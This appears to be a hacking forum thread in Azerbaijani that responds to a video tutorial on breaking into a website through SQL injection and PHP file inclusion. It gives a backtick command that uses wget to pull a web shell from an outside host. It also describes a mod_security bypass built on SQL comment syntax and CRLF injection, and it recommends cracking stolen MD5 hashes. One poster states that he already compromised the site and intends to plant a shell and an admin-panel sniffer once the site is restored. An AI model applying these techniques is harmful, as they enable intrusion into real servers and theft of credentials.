include səndə getdi çünki allow_url_include =On idi.
Əksər serverlərdə yuxarıdakı php.ini direktivi OFF olur.
Yəni remote heçnə include edə bilməzsən.
Elə hallarda default allow_url_fopen() vasitəsilə shelli dolayı yaza bilərsən.
Daha sonra fikir verdim system() funksiyasına da özünü cırırdı mod_security.
Onu başqa cürə də bypass etmək olar ən sadə yolu backtick vasitəsilə yəni `wget http://shell.shell/shell.txt -o shell.php`;
system() -in eynisidir.(disable edilməyibsə yaxud safe_mode =On deyilsə)
Vasitəsilə.
mod_security xüsusilə hostgatorda adamın beynini xarab edir.
Bu da bir bypass yolu verim lazım olar kiməsə: http://pastebin.com/vPq7HVbW
Qısacası bypass yolu /*!40101 */ və %0d%0a%0d%0a <=CRLF injectionla birgə.
+ Bro çalış bu kimi attacklarda mütləq birinci phpinfo() -nu alasan.
+Fikir verdim short open tag istifadə edirsən.Aldada bilər səni.
Çalış <?php phpinfo();?>
PHP tagları aç həmişə.
Onu alanda sistem haqqında həddindən artıq çox məlumata sahib olmuş olursan.Bilirsənki nə disabledir nə isə enable.O halda daha asan vurub çıxmaq olur.
+Heç vaxt inanmakı google-da tapılmayan MD5 deməli qırılmayıb.
Mütləq həmişə 1-ci növbədə md5decrypter.co.uk -da yoxla.
Vaxtınızı ayırıb izlədiyiniz üçün təşəkkürlər
Həə Bro, php-idirsə burda varyantlar çoxdu ee )) nəmm, aqlıma ilk gələnlərdəndə biri include oldu oda girdi elə )))
+ phpinfo()-da da Forbidden idi... Ona görə videonu çəkəndə birbaşa die()-dən başladım ))
hə bro yazdıqın bypass üsulu da əla üsuldu, təşəkkürlər...
+ bu saytı əvvəldən vurmuşdum, onda hashları chox decrypter saytdarında yoxlamışdım, prostu videoda qoyduqum mövzu təkcə sql inj. deyildi deyə uzatmadım, durub bir-bir o saytdarda yoxlamadım )))
+ admini saytı bərpa eləsin təzədən shell soxub admin panelinə sniff soxacam, o md5-ləri də qıraq, bəlkə gələcəkdə email yada başqa yerlərdə ehtiyacımız olar...
ömrümdə belə super videodərslik görməmişdim))əladı.təşəkkür.
bir də bir söz soruşum.Saytın adını yazacağın yerin aşağısında balaca yer var o deyəsən mozilla üçün addonsdu.onun adı nədi?bir də Tamper Popup var onu necə edim?
Axrıncı sualım.O saytın adının axrına kodlar yazırdın hamsını da əzbər bilirsən.bunu hardan öyrənmək olar?elə kitab varsa inboxa göndər də zəhmət olmasa))
Videoa görə bir daha təşəkkür.Super idi
O kodları əzbər bilməy üçün az-çox mysql və php dillərini bilməlisən. Googledə axtarsan yetərincə dərsliklər tapa bilərsən, həmçinin bizim forumdada az deyil dərsliklər.
))
